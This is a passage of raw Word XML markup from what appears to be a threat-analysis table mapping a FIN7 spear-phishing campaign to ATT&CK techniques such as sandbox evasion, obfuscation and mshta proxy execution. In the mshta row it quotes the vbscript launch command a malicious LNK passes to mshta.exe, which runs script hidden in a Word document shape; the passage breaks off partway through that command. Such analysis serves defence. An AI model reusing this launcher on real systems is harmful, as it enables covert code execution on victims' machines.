          <w:p w14:paraId="287B0506" w14:textId="2F69F4CA" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00456E52" w:rsidRPr="00456E52">
              <w:t>In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00794624" w:rsidRPr="00B857D7" w14:paraId="1DB99F1E" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0145ED4A" w14:textId="104B0307" w:rsidR="00456E52" w:rsidRDefault="00456E52" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72ACE35B" w14:textId="16126E19" w:rsidR="00456E52" w:rsidRPr="00B857D7" w:rsidRDefault="00456E52" w:rsidP="00EC403C">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333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D9B1218" w14:textId="4BD04745" w:rsidR="00456E52" w:rsidRPr="00B857D7" w:rsidRDefault="00456E52" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456E52">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00456E52">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1497</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00456E52">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Virtualization/Sandbox Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="711207A5" w14:textId="28BFD8AB" w:rsidR="00456E52" w:rsidRDefault="00456E52" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BBC388E" w14:textId="77777777" w:rsidR="00456E52" w:rsidRPr="00B857D7" w:rsidRDefault="00456E52" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ED283EA" w14:textId="61B09B4D" w:rsidR="00456E52" w:rsidRDefault="00456E52" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D1B8A2A" w14:textId="6ED0E101" w:rsidR="00456E52" w:rsidRDefault="00456E52" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34904526" w14:textId="78C61215" w:rsidR="00456E52" w:rsidRDefault="00456E52" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00456E52">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="6B72645C" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F1AB3EF" w14:textId="23131801" w:rsidR="00A3361C" w:rsidRDefault="00A3361C" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E758F6D" w14:textId="77777777" w:rsidR="00A3361C" w:rsidRPr="00B857D7" w:rsidRDefault="00A3361C" w:rsidP="003241F8">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333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F0BF388" w14:textId="357394CC" w:rsidR="00A3361C" w:rsidRPr="00B857D7" w:rsidRDefault="00A3361C" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A3361C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A3361C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A3361C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="188A8552" w14:textId="77777777" w:rsidR="00A3361C" w:rsidRDefault="00A3361C" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15295742" w14:textId="77777777" w:rsidR="00A3361C" w:rsidRPr="00B857D7" w:rsidRDefault="00A3361C" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0548DA" w14:textId="77777777" w:rsidR="00A3361C" w:rsidRDefault="00A3361C" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BC8D725" w14:textId="77777777" w:rsidR="00A3361C" w:rsidRDefault="00A3361C" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42F27B56" w14:textId="11FDA0DD" w:rsidR="00A3361C" w:rsidRDefault="00A3361C" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="007E7904">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See 7 below. Script hidden in text of document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="6D1777B4" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F8981DA" w14:textId="64AF1527" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00A3361C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="694759A4" w14:textId="77777777" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">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7146D36C" w14:textId="77777777" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4529D730" w14:textId="77777777" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DC89804" w14:textId="77777777" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57EFA898" w14:textId="25AE9A2C" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71311723" w14:textId="13B69F83" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03519D98" w14:textId="3DAD5858" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] See </w:t>
            </w:r>
            <w:r w:rsidR="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00794624" w:rsidRPr="00B857D7" w14:paraId="09069A49" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="277C4F07" w14:textId="32928185" w:rsidR="00067DF9" w:rsidRDefault="00A3361C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66F08227" w14:textId="7AD22270" w:rsidR="00067DF9" w:rsidRPr="00B857D7" w:rsidRDefault="00067DF9" w:rsidP="00EC403C">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333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33BDFE5E" w14:textId="10E93560" w:rsidR="00067DF9" w:rsidRPr="0067433A" w:rsidRDefault="00067DF9" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1218.005</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">System Binary Proxy Execution: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AD41AB7" w14:textId="277A4210" w:rsidR="00067DF9" w:rsidRDefault="006D1649" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5611ABA8" w14:textId="77777777" w:rsidR="00067DF9" w:rsidRPr="00B857D7" w:rsidRDefault="00067DF9" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EF32950" w14:textId="38D5B667" w:rsidR="00067DF9" w:rsidRDefault="00067DF9" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5184E7BC" w14:textId="17F70953" w:rsidR="00067DF9" w:rsidRPr="00B857D7" w:rsidRDefault="00067DF9" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE/</w:t>
            </w:r>
            <w:r w:rsidR="00A40CA5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A97395D" w14:textId="0D047956" w:rsidR="00067DF9" w:rsidRPr="00067DF9" w:rsidRDefault="00067DF9" w:rsidP="00067DF9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>The malicious LNK launches “mshta.exe” with the following arguments passed to it:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0236C85A" w14:textId="77777777" w:rsidR="006D3412" w:rsidRDefault="00067DF9" w:rsidP="00067DF9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>vbscript:Execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">("On Error Resume </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BB874CD" w14:textId="77777777" w:rsidR="006D3412" w:rsidRDefault="00067DF9" w:rsidP="00067DF9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Next:set</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> w=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>GetObject</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>(,""</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Word.Application</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>""):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C1B92BD" w14:textId="77777777" w:rsidR="006D3412" w:rsidRDefault="00067DF9" w:rsidP="00067DF9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">execute </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>w.ActiveDocument.Shapes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>(2).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72BAF2EE" w14:textId="18D91742" w:rsidR="00067DF9" w:rsidRPr="00B857D7" w:rsidRDefault="006D3412" w:rsidP="00067DF9">
            <w:pPr>
              <w:rPr>
